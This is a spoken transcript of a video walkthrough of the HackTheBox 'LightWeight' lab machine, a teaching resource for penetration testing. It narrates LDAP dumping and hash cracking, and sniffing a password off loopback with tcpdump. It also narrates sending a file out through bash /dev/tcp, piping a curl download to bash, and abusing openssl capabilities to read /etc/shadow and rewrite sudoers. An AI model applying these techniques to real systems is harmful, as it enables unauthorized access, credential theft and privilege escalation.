What's going on YouTube? This is Ipsec and we're doing LightWeight from HackTheBox, and I really like this box because number one, it's straightforward, and number two, it incorporated a lot of things we've seen in previous boxes, namely the YPuffy box with LDAP stuff, and then Waldo with Linux capabilities, which come into play on the first and third hop. The first hop, tcpdump, has the capability to allow all users to sniff the traffic, and you can sniff a password off the loopback adapter. The third hop, openssl, has the capability to do anything, so essentially it's a set UID binary. Unfortunately, you can't use it to get a reverse shell, but you can use it to read and write files, which then, of course, you can get root from that. So, with all that being said, let's just jump in. As always, the first step we do is nmap with -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it lightweight, and then the IP address, which is 10.10.10.119. Can take some time to run, so I've already ran it. Looking at the results, we see just 3 ports are open. We have SSH on port 22, HTTP on port 80, and that's Apache version 2.4.6, and it's running CentOS or CentOS, I don't know how to pronounce it. And then finally, we have LDAP on port 389, and this is exposing its common name, which is lightweight.htb. We can figure out what version of CentOS this is by just searching for this Apache version, and I'm going to replace CentOS with Red Hat, because Red Hat is essentially the paid version of CentOS, and paid things have much better support than the free alternative. So whenever I have a CentOS problem, I Google for Red Hat. So we see Red Hat Enterprise Linux 7 is based upon Apache version 2.4.6. And then if this was a CentOS 6 box, I would assume we'd be seeing Apache 2.2.1.5. So we know this box is relatively up to date. So let's just take a look at what the web page has, and then we'll also take a look at LDAP. But before we do anything, the LDAP results did give us the host name of the box, so let us just add that into our host file in case that becomes critical. So we do 10.10.10.119 and lightweight.htb and then just lightweight. So now our box can resolve to either or. So let's open up a web browser and go to 10.10.10.119 and then also lightweight.htb to make sure these pages are the same. It looks like they are, and we have something called Slender, and then we have a GitHub link. It looks like up there, so we can see what this is. A responsive and lightweight slider for modern browsers. So this looks like it's just the source code to this, and we don't really see any pages. If we refresh the page right away, we do see 3 pages, but it eventually goes away. So refresh, look at what these are. And then let us run GoBuster. The important thing to note is we know the page does have PHP files, as we see the 3 extensions are PHP. So I'm going to go over to GoBuster, do -u, we're going to put the URL, we'll do -w for wordlist, user, share, wordlist, GoBuster. Actually, let's change it up. Let's not do GoBuster. Let's use seclist, and then we can do discovery, web content, and is there any PHP? We have PHP fuzz.txt. Let's take a look at what this file is real quick. I'm just looking for like PHP file names, and it looks like I don't want that. So let's do cd user share seclist discovery web content ls grep-i php, and I'm going to do Common-PHP file names. So let's do less on this file. We see it's already appending the .php extension for us. So I'm going to do cd dash to go to my previous working directory. And I'm going to do GoBuster -u http 10.10.10.119 user share seclist discovery web content Common-PHP file names, and I forgot to do -w, and then we'll just let this run. So we see index.php, user.php, info.php, reset.php. I don't know if we found reset.php here. We just have these 3. So we can also add reset.php and see what happens. So reset, and we're not getting a response. And it looks like our GoBuster stopped getting a response as well. So my guess is we've probably activated some type of like denial of service protection, as the web server is now blocking us. So if we try to curl 10.10.10.119, we can't get to it. Port 80 is rejecting a connection. Even if we run nmap-p 80 10.10.10.119, we do see it is filtered, which means the web browser is no longer sending us any packets back. It's not even sending us a reset, which is indication that iptables has blocked us. So while we're blocked, let's see if port 389, which is LDAP, is open. It is. So it looks like a block is only on port 80. So let us just do some enumeration of LDAP and see if by the time we're done this, it unblocks our port 80. So let's check for anonymous authentication with ldapsearch -x-h 10.10.10.119. And it looks like this does return fine. We just see result 32, no such object, because in order to enumerate LDAP, you need to know what the root DSE is, which is essentially the root domain of LDAP. We go into a lot of this in the Why Puffy video, so I'm not going to go over it again. If you want to, you can watch that, where we WireShark a Nmap script that does this and then analyze how it works. So we're just going to know that we need to specify the search scope as base. The other options would be like one, sub, and children, but base is the one we want. And then we want to get the naming context, which will show us the root DSE. And we see that is DC for distinguished. I don't know what DC stands for, but anyways, DC LightWeight, DC HTB. So now we can search this LDAP branch or whatever it's called. So we can do -b and then put this in quotes. And now we dump the LDAP. So going over to the top, we have information about the domain, the manager, we have the people OU, and then we have LDAP user 1, and then a password. We have LDAP user 2 and a password. It's a shadow account. So this is telling me probably going to be something along the lines of a local login. So I'm just going to copy this, split my pane, v hashes, paste, go up here, and copy that second line of that. Paste. Let's go to a new line, get this next one. I'm sure there's a better way to copy this, but I am lazy and this doesn't take too long. I need to be here so I can copy, paste, copy, paste. And now let's keep going down. That is LDAP user 2 and LDAP user 2 is that. And we also have LDAP user 1 and 2 yet again. This is POSIX group, not calling it shadow. So it's a slightly different user object. And then we have these passwords as the same. So I'm only going to copy it once, and that is the end of the command. So let's put this line here as well. And we see everything is beginning with the same, E2NYEX. And this looks like it is going to be base 64 because of the character set. We just see numbers and digits, and some end with equals. So I'm going to do base 64-D hashes, and it looks like it is indeed base 64. I wonder if we can put a line break in this. No, we can't. So let's just cat hashes, and then we'll on base 64 one at a time. So copy this, base 64-D. That's not the command. Echo-n, the hash, pipe it to base 64-D. And we see this hash is crypt, then $6, 3Q, whatever, another dollar, and a password. So this looks like is going to be, I think that's SHA-512 encoded for local Linux or whatever. So let's copy this next one. But before we do that, let's send this into the file called hashes.shadow. we'll do echo-n, paste the hash, base64-d. It looks like it's the same, so send that over to hashes.shadow. And let's do the final one. So echo-n, base64-d, and we just get cryptx, so we don't really have anything. So let's go into hashes.shadow and manually put a line here because it did not do it for us. And then we want to delete this crypt thing because shadow passwords generally begin with that algorithm. So I think that's 6 characters. It's 7, miscounted. There we go. I just hit 7x to do a remove character 7 times. So we can save this file, and I'm going to send this over to the Kraken and start cracking this, and then we can check if the web page is available. So let's do SSH Kraken, and then v hashes, oh wait, we have to go into the hashcat directory, and then v hashes lightweight dot, I'll call this shadow, paste it, run hashcat with example dash hashes, which prints out all the hashes, and then search for $6, and we see that is SHA-512 crypt. That is mode 1800. So we can just do /hashcat dash mode 1800, the hash file, which is hashes lightweight.shadow, and I'm just going to do opt wordlist rocku.text, and this probably won't complete because SHA-512s actually take quite a while to crack. So I'm just going to make sure this starts, and then we'll go and poke at the web page. There we go, hashcat has started, and you can see even with my 41080s, oh, it's only going to take 6 minutes. So a bit quicker than I had expected. So we'll run through Rocku and then see what else we can do. But let's go and enumerate the web page while that works. And I'm going to rename this window to Kraken. So, or maybe rename that pane, whatever it's called. So let's go back to Firefox and check if we're still blocked. So 10.10.10.119. Doesn't look like we are. So let's go take a look at what info status and user is. I had already opened them up, so we can't do any automated brute forcing. So let's just read these contents. So let's see. As part of SDLC, which I have no idea what that is, probably a company name. We do have a thing mentioning the server is protected against some kind of threats. For instance, brute forcing. If you try to brute force, you may be banned for up to 5 minutes. So if we had read this, we would have known not to GoBuster it. A list of banned IPs is on here, which is the statuses page. If you'd like to get into the box, then go to the user page. So I'm going to check the user page, and it tells us the server lets you SSH in. Your IP 10.10.14.3 is automatically added as the user ID and password with a minute of your first HTTP request. We recommend that you change your password once you log in. So let's try SSHing into this box with our IP address. SSH 10.10.14.3 at 10.10.10.119, and wait for the SSH to give us an authentication prompt. And then we'll put our IP address again for the password, and it lets us log right in. It tells us to change our password, but hey, we're lazy. I'm not going to worry about doing that. We do it ls, we don't really see anything. LSLA, don't see anything. I'm going to cat etsy passwd to see if we have local users in the box or it's doing some type of LDAP authentication. And we do have local users on the box. Something interesting is there's also an account for 127.0.0.1. If I go cd home 127.0.0.1, we get permission denied, but I'm going to guess his password's also the IP address, so I'm going to check that out with an SU to switch users to him, and we forgot to specify the username, so 0.0.1, 127.0.0.1 as the password. We get it as him, and his home directory is the same exact thing. There is a .config directory, so let's check that out. And I think that was in our directory as well. When we do ls, there is abrt. I'm going to file against that to see what it is. It is a directory, lsla, and now we are empty. So I'm just going to do find -type f, which will find all files and I think also show hidden files. And we don't really see anything. So there is a last notification in .cache. If we file against that, it is ASCII text. We can cat it, and it looks like it's probably an epoch timestamp. So we can run that find command against our current IP address, so find .-type f, and it's the same exact thing as 127.0.0.1. So I'm at a complete loss right now, and when I'm at a complete loss, I do a bunch of recon, so let's run LinEnum. So opt LinEnum, and the one important thing that I change in LinEnum is I set thorough equals to 1 at the beginning, because there's a bunch of thorough checks that are helpful, so I always like setting that there. So I'm going to copy opt LinEnum.sh to my current directory, and I want to make a www, and we can move LinEnum in there, go in www, and then Python simple HTTP server port 80, and we can curl 10.10.14.3, then linenum.sh, pipe it over to bash, and let this run. It has now finished, so let's go to the very top of a command by searching a terminal history for linenum, and then we can search down for bracket dash bracket to go to each header. We can see thorough tests were enabled. Kernel information, it looks like this may have been compiled around the time of the box release, so I'm not going to worry too much about this. We do see CentOS version 7, so we are correct when we guessed it based upon the Apache version. Hostname, lightweight.htb, users groups, users that have previously logged into the system, root, LDAP user 2, so we didn't log in with these. That is definitely interesting, so something to keep in mind. This looks like it is also from maybe test in the box because it's Friday, November 16th. And then this one, of course, is us, and this is, of course, us, which is today. So we can see who else is logged on right now. No one. Users of the box, we looked at that. Looks like we have some ADM users, not too concerned. PassWD, we've looked at that. Permissions on home directories. It doesn't look like anything is relaxed. We have the owner of the directory has read, write, execute groups, and everyone doesn't have anything. So looking at word readable files, nothing interesting. Environment variables, not too interesting. SC Linux is enabled and in enforcing mode, so that is interesting. Going through these, nothing there. Cron jobs, looking through, it looks like everything is default, so nothing to see there. Cron jobs last executed, nothing to see. Systemd timers, we see something passed 33 minutes ago, and it's got 23 hours until the next check, so nothing there. The network and IP information, the address is network adapters ENS33 and LO for loopback. ERP history, we don't really see anything there, so we know there's no like Docker containers or anything, or boxes that talk to this. Name servers quad 8, which is the, I think, Google listening TCP. We have 443, 389, 111, and 80. I don't think we saw 443 open, so it looks like IP tables is definitely on the box. We may want to do like IPv6 and see if we can hit it, or hit this box over IPv6, and potentially get to a different web server. We could also potentially enumerate the Apache config as a low priv user to see if any virtual host exist. UDP 806, port 806, that is interesting. I don't know offhand what program is listing on that. Running processes. T is currently running, so that may be related to the web server. I'm not sure exactly what that is. T takes standard out and directs it to a file. If we keep going down, sudo Apache, Apache modules, that would have seen the Apache module installed on Crime Stoppers. Useful file locations, can we read write files? SUID files, it looks like everything is normal. I don't see anything I don't really recognize. GUID files, don't really see anything I don't recognize. Files with POSIX capabilities, and we have tcpdump running as lets us these extended permissions let us run tcpdump as root, which means we can capture some packets. So that is definitely good to know. If we had sudo access to tcpdump, we could have just went to GTFOBins and searched for tcpdump and been able to execute commands. But since this is using Linux capabilities and is restricting us to capnet admin and capnet raw, we can't execute commands as root because tcpdump doesn't get that permission as root. If you want to know more about these extended capabilities, check out the Water machine because I think this is the first time we've done it. But we have tcpdump, so let us start some captures. So I'm going to rename this pane to SSH and then create a new pane to do our packet captures with. So now let's do SSH, our username, which is 10.10.14.3, and the IP address of the server, which is 10.10.10.119. I'm going to run tcpdump-i, ENS33 was the network device, -u, this is going to prevent it from doing a bunch of buffers. If we wanted to, we can do man tcpdump, and then look for -U, and you can see exactly what it does. It'll cause the output to be packet buffered, so the output is written to standard out at the end of each packet instead of each line. So that's just going to help us a little bit there. Then we can do -S0 to capture everything. There's no limit on the size. I forget what the default is, but I think it may be the headers. Then we're going to do -W-, and this is going to write it to standard out. So the handy thing with this is we don't have to create any files on the box. We can just do everything. And command not found tcpdump. I'm going to call it lies, because I know tcpdump's there. So let's just do which tcpdump and use the full path, which is user sbin. So let's do that and see if this one works. But as I was saying, this will let us do a tcpdump without actually touching the disk of the server. And once we prove that we can do that, we're going to direct it to a file on our box. So put my password in, and we can see we're doing a tcpdump, and holy cow, that's a lot of information. We've got one critical piece, which is not port 22, so we don't capture our SSH traffic. So let's do that, and now direct this to a file. We'll call it network, or we'll call it lightweight.ens33.cap, and we'll just have to enter the password, which is the same as our username, 10.10.14.3, and we see it is listening on ENS33. So if we split the pane and do WireShark -k, -k just means it's going to start it immediately, and then we can do lightweight ENS33.cap. That'll open up WireShark. Where is... oh, this isn't a live capture, so we don't need -k. So, -k is for live captures. We can see, I guess, nothing is there yet. So let's send some data to it. So I'm going to send it to the info page, the status page, and the user page. So now let's do WireShark yet again. And we see data. So the thing I'm mainly looking for is what the server does, because we know this actually creates a user via LDAP or does something. So that's the traffic I'm trying to see, is the server actually doing that. And I don't see that. All I see is the actual us requesting pages. We can follow each thing in the TCP stream and see, yes, this is indeed our box. So I'm going to close out of WireShark, and we're going to keep that one capture running and start another one. So 10.10.14.3 at 10.10.10.119. And we'll do the same exact thing, except instead of ENS33, we're going to do LO for the loopback. And then instead of writing it to a file, let's show WireShark -k-i for the file. And we're going to specify dash, which means standard in. So, or -i is interface for WireShark, not file. So the interface is standard in. So we're on loopback sniffing. We can put our password, and we see we are indeed listening. WireShark doesn't show anything, but if I do a ping localhost on the box, we can see indeed that, like magic, it appears over in WireShark. So let's go refresh all the pages yet again and see if we see anything. And if we don't, then I'm going to try this reset.php. But without knowing what reset.php does, I don't want to just blindly execute it because it may kill a bunch of sessions, change our usernames, etc., which would also destroy the WireShark. So always be cognizant of exactly what scripts you are running. And now WireShark showed us a bunch of information, and it shows the source 10.10.10.119, the destination, the same IP 10.10.10.119, did a bunch of LDAP requests. So I'm going to do follow TCP stream, and we can see LDAP user 2, its group is people, DC is lightweight HTTP, authenticated with 8BC whatever. So if you did not know that, you could also drill down in Nmap to see exactly how that's formatted. So clicking the down arrow a bunch of time, we see the user, LDAP user 2, authentication simple, and then the password. So I'm going to copy, and I think I want to copy the value. So let's go back over to terminal, do su-ldap user 2, and paste the password, and we'll see if it lets us in. Authentication failure, 2-0. It ends with 2, so I don't know why 2-0 is in my clipboard, but I'm just going to copy up to 2 because this is what WireShark's saying, that 0 is not there, so maybe I goofed up somewhere. So let's copy that, do that SU again, log in, and we have one failed login attempt, but we are LDAP user 2. So we do have a backup.7zip, so I'm going to see if I can netcat it over my box. Netcat's not on this box, so we could try SCPing it. So we could just do like SCP LDAP user 2, backup.7z I think it was. The host name 10.10.10, 10.10.10.119, and then the file backup.7z, copy to a current working directory, and I need to specify LDAP user 2. Paste the password in, and let's see, permission denied. What do I have in my clipboard? LDAP user 2. I wonder if this user just can't log in over SSH. So instead of doing SCP, let us just transfer it over something other than netcat. So we can do cat backup.7z and direct it to the file dev tcp 10.10.14.3 port. We'll do 9001 because you got to be over 9000 to be cool. So let's just make a dir files, and we will do netcat lvnp 9001 and direct this to backup.7z. So I'm going to run this command, and it sends us the file. So this is a 7-zip file, so we'll do 7zx backup.7z, and it wants a password. I'm just going to try password, and it fails to decrypt it. There are a bunch of files in this, so if we try to do zip to John on backup, it fails. So I'm going to do locate, what was it? 7z to John. And we do have a Perl script, and I'm going to run this against it. But before I do, I'm going to do history grep, I think lzma. And you have to run this command. I don't think this package is on Kali by default. So if this 7z to john.pl file gives you an error, try installing this package. So we'll run this against backup.7z and get a giant hash. So I'm going to copy this to my clipboard, by entering edit mode and then just highlighting everything. Enter, and now I can go back into my Kraken, and we see it did not successfully crack any of the SHA-512 hashes. So let's do hashes backup 7z, or we'll do lightweight.backup, or lightweight.7z as the file name, and then paste. So we got the hash here. Hashcat generally doesn't like the something colon, like username colon that, so I'm just going to start off straight with the hash, and then we will run /hashcat example hashes, and then search backwards for 7z, and we can see the format is that, mode 11600. So let's run hashcat-m 11600, the file, or the hashes file, which is hashes lightweight.7z, and then we'll do the rocku word list. Now that hashcat is started, we can do status and see just how slow cracking 7-zip can be, and that SHA-512 crypt that you saw took 6 minutes says it's going to take my computer 32 minutes. I think the password's near the top of the list, so it shouldn't really take that long, but gives you an idea just the strength of this encryption algorithm versus the shadow file. 7-zip encryption is relatively decent. And we see that hashcat has just cracked it, and the password was delete. So if we scroll up, we can see right here, delete is the password. So let's go back to a shell in a box. It is in files, and we can do 7zx backup.7z, type delete for the password, and it did not error this time, and we have the password to all the files. So let's look at reset.php, and I'm actually going to use Vim, so I have the syntax highlighting, and we see a reset request has been accepted for the account. Please wait up to a minute. Your account will be deleted and added again. And let's see. It's grabbing server.remote address to do a file put contents. So that looks just fine. We could potentially look at exactly how this address gets created, if it's affected by like the host header. And if it's affected by the host header, maybe we could delete and re-add root, but I don't think that'll be the case. So let us look at the next file. Let's look at status.php, and we can see username LDAP user1, and it's got a password. So we don't know LDAP user1's password until now, so this is a new account. So let's grep password from status so we can easily copy it, and then try logging in with LDAP user1. So let's go back to SSH and do I wanted su-ldap user1, paste the password, and we get logged in. Looking at this directory, we have capture.pcap, ldaptls.php, openssl, and tcpdump. So let's do git cap on star, and we can see tcpdump has the same exact capabilities as the other one, but openssl just has equal EP. So to understand capabilities, we can do man capabilities, and then you could read this whole man page. I'm going to cheat and search for empty capability. Maybe it's not in this one. Let's do man capabilities on my box. If I could type capabilities and then search for empty capability, we can see what happens. It says, note that one can assign empty capability sets to a program file, and thus it is possible to create a set user ID root program that changes the effective and saved set user ID for a process and executes that program to 0. Essentially, this is a long way to say that if you have EP, which stands for, let's see if we can pull it up real quick. It stands for effective and permission, I believe. But if you have a blank one, as in, let's see, where's my window? We're SSH at 2. If you have a blank one, which means it doesn't have any permissions tied to it. It is all permissions, not none. So we have all permissions with this capabilities module to do whatever we want. So let's go back to GTFOBins and look at openssl. So we'll do openssl, and there's a reverse shell file upload, download, write, read, suid, or setuid, or sudo. Let's look at reverse shell and sudo. So sudo, it looks like it's doing, let's see, calling bash over here, and then I don't know exactly what it's doing. Sudo sc which openssl l file write. I honestly haven't done this and not sure what it's doing. So looking at the reverse shell, we can see the reason why this one won't work is because openssl probably won't execute bin sh. If the execution was within an argument, then we probably could, but since it's not, it won't work. And I'm going to stare at this again real quick. So let's see. On the attacker box, run this. Communication between attacker and that will be decrypted. sh which openssl. I don't think this will work without sudo. Yeah, this is doing the same thing as the previous one, so 99.9% sure that won't work. Let's just do file reads, which is a bit easier. L file equals file to read, openssl encode or enc. I don't know what enc stands for. I think encode, input file, L file. So we're not going to set the variable. We're just going to do it manually. So to verify, let us do openssl enc in etc shadow, because we can't read shadow unless we're root. And this probably has to be lowercase. And we get a permission error. And the reason why is because if we look at which openssl, we are running out of bin openssl. And if we do get cap on bin openssl, we don't have any extend capabilities. So we have to do the previous command with // to run out of the one in our home directory. And now we can read the shadow file. So let us see if we can read the sudoers file. We can't, but we can do etc sudoers, and let's see, wheel all. So let's copy this to sudoers, lsla. We can see that we own it, because again, when you do things like this, this is not taking the file permissions as this command, it takes it as your current user. So now we can do vi sudoers and edit this file. So let us do, instead of wheel all, we can do ldap user 1. Actually, let's do, because I don't remember that password. I know how to get it. And let's just do 10, 10, 14, 3, all. And then exit that. And we can do openssl. And we want to do file write. So let's see how to do this. Echo data. And then openssl enc out l file. So we can probably just cat the file and then specify it with -out. So we can do cat /sudoers, pipe it over here. Instead of -in, we'll do -out. And we can do -in to read it again to make sure we made the change. We did. So let us go to a SSH session, a new one, SSH 10.10.14.3 at 10.10.10.119. And the password again is going to be 10.10.14.3. And then we can do sudo -l, and we have an error. So we accidentally screwed up our config. So let's go back here, v sudoers, and let's see, what do we do? How do we specify a username? Oh, we have root right at the top. So let's, whoops, one too high, yank this with Y, put with P, and I'm just going to do LDAP user 1, and we'll try this one. So write, save, And then let's cat this again, write it, and let's just do sudo -l. And the password, that is in the backup file, so let's do cat stats grep pass. We can grab this, go up here, paste, and now it worked. So I'm going to test something real quick, because I'm not sure why the last one failed. I thought that was correct syntax, 10.10.14.3. So let's see if I indeed screwed something up. So write that file, go back to this SSH, sudo -l, syntax error near line 94, so not sure exactly what's going on there. So let's edit this file again. Line 94 is indeed this line. Maybe it doesn't like periods in the username or something weird like that, but we can now do sudo su, and we are root at LightWeight. We can do lsla and confirm wc-c root.txt. Yes, we can read it. So that is the box. Hope you guys enjoyed it. Take care, and I will see you all next week.